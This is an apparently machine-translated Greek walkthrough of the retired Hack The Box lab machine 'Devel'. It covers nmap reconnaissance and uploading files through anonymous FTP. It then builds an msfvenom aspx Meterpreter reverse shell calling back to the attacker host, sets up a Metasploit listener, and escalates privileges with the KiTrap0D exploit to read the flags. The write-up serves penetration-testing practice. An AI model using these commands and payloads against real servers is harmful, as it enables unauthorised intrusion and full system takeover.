Μείνετε ήρεμοι και χαράξτε το κουτί - Ντέβελ

Το Hack The Box (HTB) είναι μια διαδικτυακή πλατφόρμα που σας επιτρέπει να δοκιμάσετε τις δοκιμές διείσδυσης. Περιέχει πολλές προκλήσεις που ενημερώνονται συνεχώς. Μερικά από αυτά προσομοιώνουν σενάρια πραγματικού κόσμου και κάποια από αυτά κλίνουν περισσότερο προς ένα στυλ πρόκλησης CTF.

Σημείωση . Επιτρέπονται μόνο εγγραφές συνταξιούχων μηχανημάτων HTB.

Το Devel περιγράφεται ως ένα σχετικά απλό πλαίσιο που δείχνει τους κινδύνους ασφαλείας που σχετίζονται με ορισμένες προεπιλεγμένες διαμορφώσεις προγράμματος. Είναι ένα μηχάνημα αρχάριου επιπέδου που μπορεί να ολοκληρωθεί χρησιμοποιώντας διαθέσιμα στο κοινό έργα.

Θα χρησιμοποιήσουμε τα ακόλουθα εργαλεία για να ανοίξουμε το πλαίσιο σε ένα πλαίσιο Kali Linux

  • χάρτης
  • zenmap
  • searchsploit
  • metasploit
  • msfvenom

Βήμα 1 - Σάρωση του δικτύου

Το πρώτο βήμα πριν από την εκμετάλλευση ενός μηχανήματος είναι να κάνετε λίγη σάρωση και αναγνώριση.

Αυτό είναι ένα από τα πιο σημαντικά μέρη, καθώς θα καθορίσει τι μπορείτε να προσπαθήσετε να εκμεταλλευτείτε αργότερα. Είναι πάντα καλύτερο να αφιερώνετε περισσότερο χρόνο σε αυτήν τη φάση για να λαμβάνετε όσο το δυνατόν περισσότερες πληροφορίες.

Θα χρησιμοποιήσω το Nmap (Network Mapper), το οποίο είναι ένα δωρεάν και ανοιχτού κώδικα βοηθητικό πρόγραμμα για τον εντοπισμό δικτύου και τον έλεγχο ασφαλείας. Χρησιμοποιεί πρωτογενή πακέτα IP για να προσδιορίσει ποιοι κεντρικοί υπολογιστές είναι διαθέσιμοι στο δίκτυο, ποιες υπηρεσίες προσφέρουν αυτοί οι κεντρικοί υπολογιστές, ποια λειτουργικά συστήματα εκτελούν, τι είδους φίλτρα πακέτων / τείχη προστασίας χρησιμοποιούνται και δεκάδες άλλα χαρακτηριστικά.

Υπάρχουν πολλές εντολές που μπορείτε να χρησιμοποιήσετε με αυτό το εργαλείο για σάρωση του δικτύου. Αν θέλετε να μάθετε περισσότερα για αυτό, μπορείτε να ρίξετε μια ματιά στην τεκμηρίωση εδώ.

Χρησιμοποιώ την ακόλουθη εντολή για να πάρω μια βασική ιδέα για το τι σαρώνουμε

nmap -sV -O -F --version-light 10.10.10.5

-sV: Ανοίξτε τις θύρες ανίχνευσης για να προσδιορίσετε τις πληροφορίες υπηρεσίας / έκδοσης

-O: Ενεργοποίηση ανίχνευσης λειτουργικού συστήματος

-F: Γρήγορη λειτουργία - Σάρωση λιγότερων θυρών από την προεπιλεγμένη σάρωση

- φως μετατροπής: Όριο στους πιθανούς ανιχνευτές (ένταση 2)

10.10.10. 5 : Διεύθυνση IP του πλαισίου Devel

Μπορείτε επίσης να χρησιμοποιήσετε το Zenmap , το οποίο είναι το επίσημο Nmap Security Scanner GUI. Πρόκειται για μια εφαρμογή πολλαπλών πλατφορμών, δωρεάν και ανοιχτού κώδικα που στοχεύει στο να διευκολύνει τη χρήση του Nmap για αρχάριους ενώ παρέχει προηγμένες δυνατότητες για έμπειρους χρήστες Nmap.

Χρησιμοποιώ ένα διαφορετικό σύνολο εντολών για να εκτελέσω μια εντατική σάρωση

nmap -A -v 10.10.10.5

-A: Ενεργοποίηση ανίχνευσης λειτουργικού συστήματος, ανίχνευσης έκδοσης, σάρωσης σεναρίων και traceroute

-v: Αύξηση του επιπέδου λεκτικότητας

10.10.10.5: Διεύθυνση IP του πλαισίου Devel

Εάν βρείτε τα αποτελέσματα λίγο υπερβολικά, μπορείτε να μεταβείτε στην καρτέλα Ports / Hosts για να λάβετε μόνο τις ανοιχτές θύρες.

Μπορούμε να δούμε ότι υπάρχουν 2 ανοιχτές θύρες:

Λιμάνι 21 . Έλεγχος πρωτοκόλλου μεταφοράς αρχείων (FTP) (εντολή). Εδώ είναι ένα Microsoft FTP

Θύρα 80 . Πρωτόκολλο μεταφοράς υπερκειμένου (HTTP). Εδώ είναι ένας διακομιστής IIS

Το πιο πιθανό αρχικό διάνυσμα επίθεσης φαίνεται να είναι το FTP σε αυτήν την περίπτωση

Βήμα 2 - Το ευάλωτο FTP

Ανοίγουμε τον Firefox και επισκέπτουμε τον ιστότοπο στο //10.10.10.5

Από τη φάση αναγνώρισης, βρήκαμε 2 αρχεία κάτω από το Microsoft FTP. Ας δούμε αν μπορούμε να αποκτήσουμε πρόσβαση σε αυτά από το πρόγραμμα περιήγησης.

Μπορώ να αποκτήσω πρόσβαση στο αρχείο εικόνας Welcome.png μεταβαίνοντας

//10.10.10.5/welcome.png

Μπορώ επίσης να έχω πρόσβαση στη σελίδα iisstart.htm

//10.10.10.5/iisstart.htm

Τώρα γνωρίζουμε δύο πράγματα:

  • Το FTP χρησιμοποιείται ως κατάλογος αρχείων για τον διακομιστή ιστού - ανακαλύφθηκε όταν αποκτήσαμε πρόσβαση στα αρχεία από τη φάση αναγνώρισης.
  • Το FTP επιτρέπει ανώνυμη σύνδεση - ανακαλύφθηκε όταν πραγματοποιήσαμε την έντονη σάρωση.

Ας δούμε αν μπορούμε να δημιουργήσουμε ένα αρχείο και να το προσθέσουμε στο FTP

Δημιουργώ ένα αρχείο χρησιμοποιώντας αυτήν την εντολή και εξάγω το αποτέλεσμα σε ένα αρχείο που ονομάζεται htb.html

echo HackTheBox > htb.html

Έπειτα ελέγχω με το ls εάν το αρχείο έχει δημιουργηθεί και ποιο είναι το περιεχόμενο του αρχείου με αυτήν την εντολή

cat htb.html

Ας συνδεθούμε τώρα με το FTP για να προσθέσουμε το δοκιμαστικό αρχείο μας

Για να συνδεθώ στο FTP, χρησιμοποιώ αυτήν την εντολή

ftp 10.10.10.5

Πληκτρολογώ ανώνυμο ως όνομα χρήστη και απλώς πατήστε enter για τον κωδικό πρόσβασης, καθώς επιτρέπει την ανώνυμη σύνδεση.

Είμαι τώρα συνδεδεμένος με το FTP.

Προσθέτω το αρχείο στο FTP με αυτήν την εντολή

put htb.html

Το αρχείο έχει σταλεί με επιτυχία. Ας ελέγξουμε αν μπορούμε να αποκτήσουμε πρόσβαση σε αυτό από τον Firefox. Επισκέφτηκα τη σελίδα και μπορούμε να δούμε την έξοδο HackTheBox στην ιστοσελίδα.

//10.10.10.5/htb.html

Τώρα που γνωρίζουμε ότι μπορούμε να στείλουμε αρχεία, ας δημιουργήσουμε μια εκμετάλλευση!

Βήμα 3 - Χρησιμοποιώντας το MSFvenom για να δημιουργήσετε ένα exploit

Θα χρησιμοποιήσουμε το MSFvenom, το οποίο είναι γεννήτρια ωφέλιμου φορτίου. Μπορείτε να μάθετε περισσότερα για αυτό εδώ

Αλλά πρώτα, ας δούμε το Metasploit Framework , το ωφέλιμο φορτίο που θα χρειαστεί για να δημιουργήσουμε την εκμετάλλευσή μας.

Γνωρίζουμε ότι πρέπει να δημιουργήσουμε ένα αντίστροφο κέλυφος , το οποίο είναι ένας τύπος κελύφους στο οποίο η μηχανή στόχου επικοινωνεί πίσω στο μηχάνημα επίθεσης. Το επιτιθέμενο μηχάνημα έχει μια θύρα ακροατή στην οποία λαμβάνει τη σύνδεση, η οποία με τη χρήση, επιτυγχάνεται εκτέλεση κώδικα ή εντολής.

Το αντίστροφο κέλυφος TCP πρέπει να είναι για Windows και θα χρησιμοποιήσουμε το Meterpreter .

Από τον ιστότοπο επιθετικής ασφάλειας, λαμβάνουμε αυτόν τον ορισμό για το Meterpreter

Το Meterpreter είναι ένα προηγμένο, δυναμικά επεκτάσιμο ωφέλιμο φορτίο που χρησιμοποιεί στάδια έγχυσης DLL στη μνήμη και επεκτείνεται μέσω του δικτύου κατά το χρόνο εκτέλεσης. Επικοινωνεί μέσω του stager και παρέχει ένα ολοκληρωμένο Ruby API από την πλευρά του πελάτη. Διαθέτει ιστορικό εντολών, ολοκλήρωση καρτελών, κανάλια και άλλα.

Μπορείτε να διαβάσετε περισσότερα για το Meterpreter εδώ.

Έχω ξεκινήσει Metasploit και την αναζήτηση για την αντίστροφη ωφέλιμα φορτία TCP. Χρησιμοποιώ την ακόλουθη εντολή

search windows/meterpreter/reverse_tcp

Βρίσκουμε ένα ενδιαφέρον ωφέλιμο φορτίο, νούμερο 2, που είναι ένα Reverse TCP Stager .Αυτό το ωφέλιμο φορτίο εγχέει το DLL του διακομιστή μετρητών μέσω του ωφέλιμου φορτίου Reflective Dll Injection και συνδέεται ξανά με τον εισβολέα

payload/windows/meterpreter/reverse_tcp

Τώρα ας επιστρέψουμε στο msfvenom για να δημιουργήσουμε την εκμετάλλευσή μας. Και πιο συγκεκριμένα ένα ανάστροφο κέλυφος aspx . Αυτό το κομμάτι των πληροφοριών έχει συλλεχθεί κατά τη φάση αναγνώρισης

Χρησιμοποιώ την ακόλουθη εντολή

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

- p : Ωφέλιμο φορτίο για χρήση

- στ : Μορφή εξόδου

- 0 : Αποθηκεύστε το ωφέλιμο φορτίο σε ένα αρχείο

LHOST : Τοπικός κεντρικός υπολογιστής

LPORT : Τοπικό λιμάνι

Έπειτα ελέγχω με το ls εάν το αρχείο έχει δημιουργηθεί. Ήρθε η ώρα να το στείλετε στο FTP

Ας συνδεθούμε ξανά με το FTP και στείλτε το μικρό μας δώρο!

Συνδέομαι στο FTP, εισάγω ανώνυμο ως όνομα χρήστη, παραλείπω τον κωδικό πρόσβασης πατώντας enter. Στη συνέχεια στέλνω το αρχείο με την ακόλουθη εντολή

put devel.aspx

Ας ελέγξουμε εάν το αρχείο έχει αποσταλεί σωστά. Επιστρέφοντας στον Firefox , μεταβαίνω στον διακομιστή FTP με την ακόλουθη εντολή

ftp://10.10.10.5

Μπορούμε να δούμε ότι το μικρό μας δώρο είναι εδώ!

Εδώ είναι το exploit, αν θέλετε να μάθετε πώς φαίνεται

Βήμα 4 - Ρύθμιση ενός ακροατή με το Metasploit

Επιστροφή στο Metasploit όπου χρησιμοποιώ την ακόλουθη εντολή για να ορίσω τον χειριστή ωφέλιμου φορτίου

use exploit/multi/handler

Ελέγχω για να δω ποιες επιλογές είναι διαθέσιμες

Αρχικά ρυθμίσαμε το ωφέλιμο φορτίο

set payload windows/meterpreter/reverse_tcp

Τότε το LHOST

set lhost 10.10.14.15

Και τέλος το LPORT

set lport 4444

Εάν ελέγξουμε τις επιλογές τώρα, θα πρέπει να δούμε ότι όλα έχουν ρυθμιστεί

Ας τρέξουμε το exploit.

Αφού εμφανιστεί αυτό το μήνυμα

Started reverse TCP handler on 10.10.14.15:4444

επιστρέψτε στο πρόγραμμα περιήγησης και μεταβείτε στη σελίδα όπου φιλοξενείται το κακόβουλο σενάριο

//10.10.10.5/devel.aspx

Στη συνέχεια, θα πρέπει να δείτε τη συνεδρία Meterpreter

Τώρα που έχω μια συνεδρία, προσπαθώ να αναζητήσω την πρώτη σημαία, το user.txt χρησιμοποιώντας την ακόλουθη εντολή στο meterpreter

search -f user.txt

Δεν υπάρχουν αρχεία που να ταιριάζουν με την αναζήτησή μου. Προσπαθώ με. * Για να δείτε άλλα αρχεία, αλλά τίποτα χρήσιμο

Στη συνέχεια, δημιουργώ ένα κέλυφος με την ακόλουθη εντολή

shell

Χρησιμοποιώ την ακόλουθη εντολή για να λάβω τις πληροφορίες του συστήματος

systeminfo

Μπορούμε να δούμε ότι ο εγγεγραμμένος κάτοχος ονομάζεται babis . Αυτό μπορεί να είναι ένα σημαντικό κομμάτι πληροφοριών όταν θα ψάχνουμε για τη σημαία χρήστη. Μπορούμε επίσης να δούμε ότι το μηχάνημα δεν έχει καμία επείγουσα επιδιόρθωση.

Ξεκινώ την πλοήγηση στους φακέλους. Χρησιμοποιώ το dir για να απαριθμήσω όλα τα αρχεία / φακέλους και το cd για να αλλάξω τον κατάλογο. Προσπάθησα την τύχη μου στους φακέλους του Μπάμπι και του Διαχειριστή , αλλά και οι δύο μου έδωσαν την πρόσβαση.

Πρέπει να κλιμακώσουμε τα προνόμια! Γνωρίζοντας ότι όταν ελέγξαμε τις πληροφορίες συστήματος, δεν βρέθηκαν επείγουσες επιδιορθώσεις, μπορούμε να προσπαθήσουμε να βρούμε εκμεταλλεύσεις που ισχύουν για αυτό το μηχάνημα.

Βήμα 5 - Εκτέλεση κλιμάκωσης προνομίων

Έβαλα τη συνεδρία στο παρασκήνιο με αυτήν την εντολή

background

Στη συνέχεια, χρησιμοποιώ την ακόλουθη εντολή

use post/multi/recon/local_exploit_suggester

Αυτή η ενότητα προτείνει τοπικές εκμεταλλεύσεις Meterpreter που μπορούν να χρησιμοποιηθούν. Τα exploits προτείνονται με βάση την αρχιτεκτονική και την πλατφόρμα που έχει ανοίξει το κέλυφος του χρήστη καθώς και τα διαθέσιμα exploits στο Meterpreter

Ελέγξω τις επιλογές και έχω ορίσει τη συνεδρία

Είναι σημαντικό να σημειωθεί ότι δεν θα εκτοξευτούν όλα τα τοπικά κατορθώματα. Οι εκμεταλλεύσεις επιλέγονται βάσει αυτών των συνθηκών: τύπος συνεδρίας, πλατφόρμα, αρχιτεκτονική και απαιτούμενες προεπιλεγμένες επιλογές

Μετάβαση στη λίστα

exploit/windows/local/bypassuac_eventvwr

αποτυγχάνει λόγω του ότι ο χρήστης των υπηρεσιών IIS δεν ανήκει στην ομάδα διαχειριστών, η οποία είναι η προεπιλογή και αναμένεται.

Χρησιμοποιώ το επόμενο exploit στη λίστα, που είναι

use exploit/windows/local/ms10_015_kitrap0d

Αυτή η ενότητα θα δημιουργήσει μια νέα συνεδρία με προνόμια SYSTEM μέσω του KiTrap0D exploit από τον Tavis Ormandy. Εάν η περίοδος λειτουργίας που χρησιμοποιείται είναι ήδη αυξημένη, τότε το exploit δεν θα εκτελεστεί. Η ενότητα βασίζεται στο kitrap0d.x86.dll και δεν υποστηρίζεται σε εκδόσεις x64 των Windows.

Όταν εκτελέσαμε το sysinfo στη συνεδρία Meterpreter, αποκάλυψε ότι ο στόχος ήταν η αρχιτεκτονική x86

Ελέγξω τις επιλογές και έπειτα ορίζω τη συνεδρία

Τρέχω το exploit.

Το exploit ήταν επιτυχές, αλλά δεν ήταν δυνατή η δημιουργία της συνεδρίας. Αυτό οφείλεται στην πρώτη γραμμή του exploit που προσπαθεί να δημιουργήσει ένα αντίστροφο χειριστή στην προεπιλεγμένη θύρα eth0 και στην προεπιλεγμένη θύρα και όχι στη διεπαφή VPN για εργαστήρια HTB.

Started reverse TCP handler on 10.0.2.15:4444

Ελέγχω τις επιλογές και ορίζω LHOST και LPORT

Στη συνέχεια, ελέγχω όλες τις συνεδρίες ζωντανά με την ακόλουθη εντολή, σε περίπτωση που η συνεδρία μου πέθανε

sessions -l

Μπορώ να δω τη συνεδρία μου

Τώρα που έχουμε μια συνεδρία μετρητή, ας ξεκινήσουμε την πλοήγηση στο φάκελο και βρείτε τις σημαίες!

Βήμα 6 - Αναζήτηση της σημαίας user.txt

Ας δούμε πρώτα πού είμαστε με την ακόλουθη εντολή

pwd

που σημαίνει κατάλογο εκτύπωσης εργασίας

Θα πάω μέχρι το C: \ και ls όλα τα αρχεία / φακέλους. Ήδη ξέρω πού να κοιτάξω από την προηγούμενη προσπάθειά μου στο Βήμα 4 - Ρύθμιση ακροατή με το Metasploit

Επιστρέφω στον κατάλογο χρηστών

Στη συνέχεια, μεταβείτε στον κατάλογο babis

Από εκεί, πηγαίνω στον κατάλογο της επιφάνειας εργασίας

Βρήκαμε το αρχείο user.txt.txt ! Για να διαβάσω το περιεχόμενο του αρχείου χρησιμοποιώ την εντολή

cat user.txt.txt

Τώρα που έχουμε τη σημαία χρήστη, ας βρούμε τη ριζική σημαία!

Βήμα 7 - Αναζητώντας τη σημαία root.txt

Επιστροφή στο C: \ για να μεταβείτε στο φάκελο Administrator και μετά στο φάκελο Desktop . Χρησιμοποιώ ls για να απαριθμήσω όλα τα αρχεία στον φάκελο της επιφάνειας εργασίας

Βρίσκουμε το αρχείο root.txt.txt !

Για να διαβάσω το περιεχόμενο του αρχείου χρησιμοποιώ την εντολή

cat root.txt.txt

Συγχαρητήρια! Βρήκατε και τις δύο σημαίες!

Μην διστάσετε να σχολιάσετε, να κάνετε ερωτήσεις ή να μοιραστείτε με τους φίλους σας :)

Μπορείτε να δείτε περισσότερα από τα άρθρα μου εδώ

Μπορείτε να με ακολουθήσετε στο Twitter ή στο LinkedIn

Και μην ξεχάσετε να # GetSecure , # BeSecure & # StaySecure !

Άλλα άρθρα Hack The Box

  • Μείνετε ήρεμοι και χαράξτε το κουτί - κουτσός
  • Μείνετε ήρεμοι και χαράξτε το κουτί - Legacy
  • Μείνετε ήρεμοι και χαράξτε το κουτί - Μπιπ